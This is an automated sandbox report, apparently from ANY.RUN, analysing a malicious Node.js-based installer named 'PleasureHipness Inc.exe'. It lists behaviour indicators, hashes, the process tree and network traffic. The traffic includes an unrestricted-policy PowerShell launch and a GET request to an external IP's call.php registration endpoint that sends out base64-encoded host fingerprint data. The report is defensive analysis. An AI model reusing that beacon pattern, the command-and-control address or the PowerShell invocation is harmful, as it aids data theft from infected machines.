File name:

643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe

Full analysis: https://app.any.run/tasks/ddfa821b-5851-4ade-8a3c-df5ee888eca3
Verdict: Malicious activity
Analysis date: December 13, 2024, 19:28:51
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
nodejs
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive, 5 sections
MD5:

297D5CE4DCBAE459987DE91D17DCB9A8

SHA1:

643E5C9F4D04D42375B344B00550BC7ED4D119E6

SHA256:

155D357DEAC165E8EB2750FC63D2BCF34E90095B61772BFF1C20D22435B2262B

SSDEEP:

786432:DgqoMmxuOvaMAZzseQE00KBRXG5Cs4Qnyg:DDoMKuOvaMAZzsmaXG5Cs4Qnv

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executing a file with an untrusted certificate

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)

    • Changes powershell execution policy (Unrestricted)

      • PleasureHipness Inc.exe (PID: 5540)

  • SUSPICIOUS

    • Malware-specific behavior (creating "System.dll" in Temp)

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)

    • The process creates files with name similar to system file names

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)

    • Drops 7-zip archiver for unpacking

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)

    • Executable content was dropped or overwritten

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)

    • Process drops legitimate windows executable

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)

    • Reads security settings of Internet Explorer

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)

    • Starts application with an unusual extension

      • cmd.exe (PID: 4528)

    • Application launched itself

      • PleasureHipness Inc.exe (PID: 5540)

    • Starts CMD.EXE for commands execution

      • PleasureHipness Inc.exe (PID: 5540)

    • The process hides Powershell's copyright startup banner

      • PleasureHipness Inc.exe (PID: 5540)

    • Starts POWERSHELL.EXE for commands execution

      • PleasureHipness Inc.exe (PID: 5540)

    • The process bypasses the loading of PowerShell profile settings

      • PleasureHipness Inc.exe (PID: 5540)

    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 4228)

    • Connects to the server without a host name

      • PleasureHipness Inc.exe (PID: 5540)

  • INFO

    • Checks supported languages

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)
      • PleasureHipness Inc.exe (PID: 5540)
      • chcp.com (PID: 3612)
      • PleasureHipness Inc.exe (PID: 5736)
      • PleasureHipness Inc.exe (PID: 2736)

    • Reads the computer name

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)
      • PleasureHipness Inc.exe (PID: 5540)
      • PleasureHipness Inc.exe (PID: 5736)
      • PleasureHipness Inc.exe (PID: 2736)

    • The sample compiled with english language support

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)

    • Create files in a temporary directory

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)

    • Changes the display of characters in the console

      • cmd.exe (PID: 4528)

    • Checks proxy server information

      • PleasureHipness Inc.exe (PID: 5540)

    • Reads the machine GUID from the registry

      • PleasureHipness Inc.exe (PID: 5540)

    • The process uses the downloaded file

      • powershell.exe (PID: 4672)
      • powershell.exe (PID: 5556)
      • powershell.exe (PID: 2084)
      • powershell.exe (PID: 5972)
      • powershell.exe (PID: 5892)
      • powershell.exe (PID: 6988)
      • powershell.exe (PID: 5564)
      • powershell.exe (PID: 5032)
      • powershell.exe (PID: 4992)
      • powershell.exe (PID: 6416)

    • Node.js compiler has been detected

      • PleasureHipness Inc.exe (PID: 5540)
      • PleasureHipness Inc.exe (PID: 5736)
      • PleasureHipness Inc.exe (PID: 2736)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6936)
      • powershell.exe (PID: 7008)
      • powershell.exe (PID: 5972)
      • powershell.exe (PID: 5564)

    • Sends debugging messages

      • PleasureHipness Inc.exe (PID: 5540)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2018:12:15 22:26:14+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
PEType: PE32
LinkerVersion: 6
CodeSize: 26624
InitializedDataSize: 473088
UninitializedDataSize: 16384
EntryPoint: 0x338f
OSVersion: 4
ImageVersion: 6
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 6.9.6.0
ProductVersionNumber: 6.9.6.0
FileFlagsMask: 0x0000
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Windows, Latin1
FileDescription: -
FileVersion: 4.6.3
LegalCopyright: Copyright © 2024 PleasureHipness Inc
LegalTrademarks: PleasureHipness
ProductName: PleasureHipness Inc
ProductVersion: 6.9.6
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
162
Monitored processes
54
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe pleasurehipness inc.exe cmd.exe no specs conhost.exe no specs chcp.com no specs pleasurehipness inc.exe no specs pleasurehipness inc.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs findstr.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
236\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
424\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1412\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1476\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1704\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1856\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2008\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2084powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePleasureHipness Inc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
2736"C:\Users\admin\AppData\Local\Temp\2q4lrrU9xmobPxyZ5U2SfO6o7kS\PleasureHipness Inc.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\admin\AppData\Roaming\boyyyhdgbntaxqtj" --mojo-platform-channel-handle=2200 --field-trial-handle=1916,i,6418311846873358346,16920656953182970438,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8C:\Users\admin\AppData\Local\Temp\2q4lrrU9xmobPxyZ5U2SfO6o7kS\PleasureHipness Inc.exePleasureHipness Inc.exe
User:
admin
Company:
GitHub, Inc.
Integrity Level:
MEDIUM
Description:
PleasureHipness Inc
Exit code:
0
Version:
4.6.3
Modules
Images
c:\users\admin\appdata\local\temp\2q4lrru9xmobpxyz5u2sfo6o7ks\pleasurehipness inc.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\oleaut32.dll
2756findstr /C:"Detected boot environment" "C:\WINDOWS\Panther\setupact.log"C:\Windows\SysWOW64\findstr.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (QGREP) Utility
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\findstr.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
Total events
104 526
Read events
104 526
Write events
0
Delete events
0

Modification events

No data
Executable files
17
Suspicious files
123
Text files
68
Unknown types
0

Dropped files

PID
Process
Filename
Type
5592643e5c9f4d04d42375b344b00550bc7ed4d119e6.exeC:\Users\admin\AppData\Local\Temp\nst396E.tmp\app-32.7z
MD5:
SHA256:
5592643e5c9f4d04d42375b344b00550bc7ed4d119e6.exeC:\Users\admin\AppData\Local\Temp\nst396E.tmp\7z-out\icudtl.dat
MD5:
SHA256:
5592643e5c9f4d04d42375b344b00550bc7ed4d119e6.exeC:\Users\admin\AppData\Local\Temp\nst396E.tmp\7z-out\LICENSES.chromium.html
MD5:
SHA256:
5592643e5c9f4d04d42375b344b00550bc7ed4d119e6.exeC:\Users\admin\AppData\Local\Temp\nst396E.tmp\System.dllexecutable
MD5:0D7AD4F45DC6F5AA87F606D0331C6901
SHA256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
5592643e5c9f4d04d42375b344b00550bc7ed4d119e6.exeC:\Users\admin\AppData\Local\Temp\nst396E.tmp\7z-out\chrome_100_percent.pakbinary
MD5:ACD0FA0A90B43CD1C87A55A991B4FAC3
SHA256:CCBCA246B9A93FA8D4F01A01345E7537511C590E4A8EFD5777B1596D10923B4B
5592643e5c9f4d04d42375b344b00550bc7ed4d119e6.exeC:\Users\admin\AppData\Local\Temp\nst396E.tmp\7z-out\locales\cs.pakbinary
MD5:04A680847C4A66AD9F0A88FB9FB1FC7B
SHA256:1CC44C5FBE1C0525DF37C5B6267A677F79C9671F86EDA75B6FC13ABF5D5356EB
5592643e5c9f4d04d42375b344b00550bc7ed4d119e6.exeC:\Users\admin\AppData\Local\Temp\nst396E.tmp\7z-out\locales\es-419.pakbinary
MD5:7F6696CC1E71F84D9EC24E9DC7BD6345
SHA256:D1F17508F3A0106848C48A240D49A943130B14BD0FEB5ED7AE89605C7B7017D1
5592643e5c9f4d04d42375b344b00550bc7ed4d119e6.exeC:\Users\admin\AppData\Local\Temp\nst396E.tmp\7z-out\locales\ca.pakbinary
MD5:D259469E94F2ADF54380195555154518
SHA256:F98B7442BEFC285398A5DD6A96740CBA31D2F5AADADD4D5551A05712D693029B
5592643e5c9f4d04d42375b344b00550bc7ed4d119e6.exeC:\Users\admin\AppData\Local\Temp\nst396E.tmp\7z-out\locales\bn.pakpgc
MD5:5CDD07FA357C846771058C2DB67EB13B
SHA256:01C830B0007B8CE6ACA46E26D812947C3DF818927B826F7D8C5FFD0008A32384
5592643e5c9f4d04d42375b344b00550bc7ed4d119e6.exeC:\Users\admin\AppData\Local\Temp\nst396E.tmp\7z-out\locales\da.pakpgc
MD5:1A53D374B9C37F795A462AAC7A3F118F
SHA256:D0C38EB889EE27D81183A0535762D8EF314F0FDEB90CCCA9176A0CE9AB09B820
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
25
DNS requests
7
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5540
PleasureHipness Inc.exe
GET
200
79.133.46.35:80
http://79.133.46.35/call.php?api=register&username=dXNlcg==&userdata=NCBHQl9bb2JqZWN0IE9iamVjdF1fTWljcm9zb2Z0IEJhc2ljIERpc3BsYXkgQWRhcHRlcl9mYWxzZV8xMjgweDcyMF9XaW5kb3dzIDEwIEVudGVycHJpc2VfMjIgbWludXRlcyAoMC4zOCBob3VycylfQzpcVXNlcnNcYWRtaW5fREVTS1RPUC1KR0xMSkxEX2FkbWluX1dpbmRvd3NfTlRfaWEzMl8xMC4wLjE5MDQ1X0M6XFVzZXJzXGFkbWluXEFwcERhdGFcUm9hbWluZ19DOlxVc2Vyc1xhZG1pblxBcHBEYXRhXExvY2FsXFRlbXBfREVTS1RPUC1KR0xMSkxEX19BTUQ2NCBGYW1pbHkgNiBNb2RlbCAxNCBTdGVwcGluZyAzLCBBdXRoZW50aWNBTURfeDg2X0M6XzRfQzpcVXNlcnNcYWRtaW5cQXBwRGF0YVxMb2NhbFxUZW1wXDJxNGxyclU5eG1vYlB4eVo1VTJTZk82bzdrU1xQbGVhc3VyZUhpcG5lc3MgSW5jLmV4ZQ==
unknown
unknown
GET
200
142.250.184.196:443
https://www.google.com/
unknown
html
18.3 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
2.23.209.161:443
www.bing.com
Akamai International B.V.
GB
whitelisted
192.168.100.255:138
whitelisted
2.16.241.12:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5540
PleasureHipness Inc.exe
142.250.184.196:443
www.google.com
GOOGLE
US
whitelisted
5540
PleasureHipness Inc.exe
79.133.46.35:80
diva-e Datacenters GmbH
DE
unknown

DNS requests

Domain
IP
Reputation
www.bing.com
  • 2.23.209.161
  • 2.23.209.177
  • 2.23.209.182
  • 2.23.209.189
  • 2.23.209.150
  • 2.23.209.158
  • 2.23.209.176
  • 2.23.209.187
  • 2.23.209.179
whitelisted
google.com
  • 172.217.18.110
whitelisted
crl.microsoft.com
  • 2.16.241.12
  • 2.16.241.19
whitelisted
www.microsoft.com
  • 88.221.169.152
whitelisted
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
www.google.com
  • 142.250.184.196
whitelisted
self.events.data.microsoft.com
  • 51.105.71.136
whitelisted

Threats

No threats detected
Process
Message
PleasureHipness Inc.exe
<--- Last few GCs ---> [5540:5B104000] 41071 ms: Mark-Compact 1001.8 (1043.1) -> 1001.1 (1043.1) MB, 2547.00 / 0.00 ms (average mu = 0.222, current mu = 0.018) allocation failure; scavenge might not succeed [5540:5B104000] 43711 ms: Mark-Compact 1008.9 (1043.1) -> 1008.2 (1058.1) MB, 2641.00 / 0.00 ms (average mu = 0.110, current mu = 0.000) allocation failure; scavenge might not succeed
PleasureHipness Inc.exe
<--- JS stacktrace --->
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe